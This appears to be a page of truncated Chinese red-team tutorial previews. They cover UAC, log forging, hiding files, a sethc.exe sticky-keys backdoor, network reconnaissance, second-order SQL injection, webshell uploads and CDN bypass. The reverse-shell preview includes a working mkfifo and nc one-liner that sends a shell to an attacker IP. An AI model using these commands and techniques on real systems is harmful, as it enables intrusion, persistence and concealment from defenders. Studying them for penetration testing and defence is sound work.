UAC 简介 UAC(UserAccountControl)是WindowsVista和WindowsServer2008引入的一个安全机制，当一些敏 感操作发生时，会跳出提示显式要求系统权限。 当用户登陆Windows时，每个用户都会被授予一个accesstoken，这个token中有securityidentifer(SID) 的信息，决定了用户的权限。 会触发UAC的操作 •以管理员权限启动应用 •修改系统、UAC设置 •修改没有权限的文件或者目录（%SystemRoot%/%ProgramFiles%等） •修改ACL(accesscontrollist) •安装驱动 •增删账户，修改...

日志 •查看日志eventvwr •伪造日志eventcreate •操作日志 –3389登录列表 –文件打开日志 –文件修改日志 –浏览器日志 –系统事件 –程序安装记录 –程序删除记录 –程序更新记录 •登录日志 –系统安全日志 •日志路径 –系统日志%SystemRoot%\System32\Winevt\Logs\System.evtx –安全日志%SystemRoot%\System32\Winevt\Logs\Security.evtx –应用程序日志%SystemRoot%\System32\Winevt\Logs\Application.evtx •服务日志 –IIS%Syst...

隐藏文件 •创建系统隐藏文件 –attrib+s+a+r+hfilename/attrib+s+hfilename •利用NTFSADS(Alternate Data Streams)创建隐藏文件 •利用Windows保留字 –aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6| 后门 sethc sethc.exe是Windows系统在用户按下五次shift后调用的粘滞键处理程序，当有写文件但是没有执行权限 时，可以通过替换sethc.exe的...

网络信息 •内网网段信息 •网卡信息ipconfig •外网出口 •ARP表arp-a •路由表routeprint •监听的端口netstat-ano •连接的端口 •端口信息 –Get-NetTCPConnection •hosts文件 •主备DNS •DNS缓存 –ipconfig/displaydns –Get-CimInstance-Namespaceroot/StandardCimv2-ClassName MSFT_DNSClientCache •探测出网情况 –powershell-c”1..65535|%{echo((new-objectNet.Sockets.TcpClien...

1二次注入  二次注入是指已存储（数据库、文件）的用户输入被读取后，再次进入到SQL查询语句中导致的注入。 过程如下： 1.第一次插入恶意数据：在第一次进行数据库插入数据的时候，使用addslashes或者是借助get_magic_quotes_gpc对其中的特殊字符进行了转义，在后端代码中可能会被转义，但在存入数据库时还是原来的数据，数据中一般带有单引号和＃号； 例如，插入1‘；转义成1\’。不能注入，但是保存在数据库时变成了原来的1’。 2.引用恶意数据，篡改正常数据：再次调用时，拼凑到SQL中就形成了二次注入。 利用1’进行注入，也很好理解，单引号提前闭合，注释后续语句。 这里...

0x01红队知识扫盲 渗透测试作为一种安全防护手段，让安全防护从被动转换成主动，正被越来越多企业及机构认可，但也仅限于是防护基础工作之一，代表企业网络系统正合法合规的运行着。然而企业的业务场景是动态变化的，黑客的攻击手法、0day漏洞更是层出不穷，红蓝队对抗便是针对此方面的测试。 红蓝队对抗是以红队模拟真实攻击，蓝队负责防御。红队（RedTeam）区别于传统的渗透测试，更偏向于实战。 0x02打点技巧总结 1.拿到靶标，资产收集 批量域名转IP，从旁站入手（挂靠在同个服务器的不同站点）； 根据IP找C段：我一般用Goby普通扫描去找C段； 先看靶标再看子域名； 子域名爆破：子域名爆破有时候往往...

一、文件上传漏洞介绍 文件上传漏洞：在网站上传普通文件的位置，未对上传的文件进行严格的验证和过滤，导致可以通过绕过上传机制上传任意文件。进而导致用户可以通过上传WebShell（与网站后端语言一致）并执行从而控制服务器 文件上传漏洞的必备条件： 文件上传功能能正常使用：能够通过绕过上传机制上传想要上传的文件 上传文件保存的路径可知：上传文件时，网页通常会带有一个返回显示上传的文件，可以通过查看网页元素的方式查看 上传文件可以被访问：可以通过文件的路径访问到改文件 上传文件可以被解析：访问该文件时，不会将源码作为网页元素直接输出 检测上传文件的方式： 客户端Javascript检测：检测文件的扩...

一、bash反弹 ①在kali机里面开启端口监听： nc-lvvpport //port为攻击主机端口号，并且此端口号没有被占用 ②在目标主机上执行： python-c'importpty;pty.spawn("/bin/bash")' 二.-e参数不可用 在目标主机使用如下命令： rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc192.168.26.1381234>/tmp/f 解释： rm/tmp/f 删除命令 mkfifo/tmp/f; 在tmp目录下写fifo文件f /bin/...

1前景知识 通常来讲，通过cmd的ping或者nslookup命令，即能快速找到域名对应IP。但很多站点出于用户体验和安全的角度，使用CDN加速，将域名解析到CDN，这时候就需要绕过CDN来查找真实IP。那么什么是CDN？ CDN全称为ContentDeliveryNetwork-内容分发网络。简单理解，资源服务器比作快递发货店家，CDN节点即为各个快递网点。快递网点会寄存一些店家的库存以方便快速发货到用户手中。这种分包的概念即为CDN的核心思想：用户请求资源时，就近返回节点上缓存的资源，而不需要每个用户的请求都回源站获取，避免网络拥塞。 2如何判断是否使用了CDN？  1.多地p...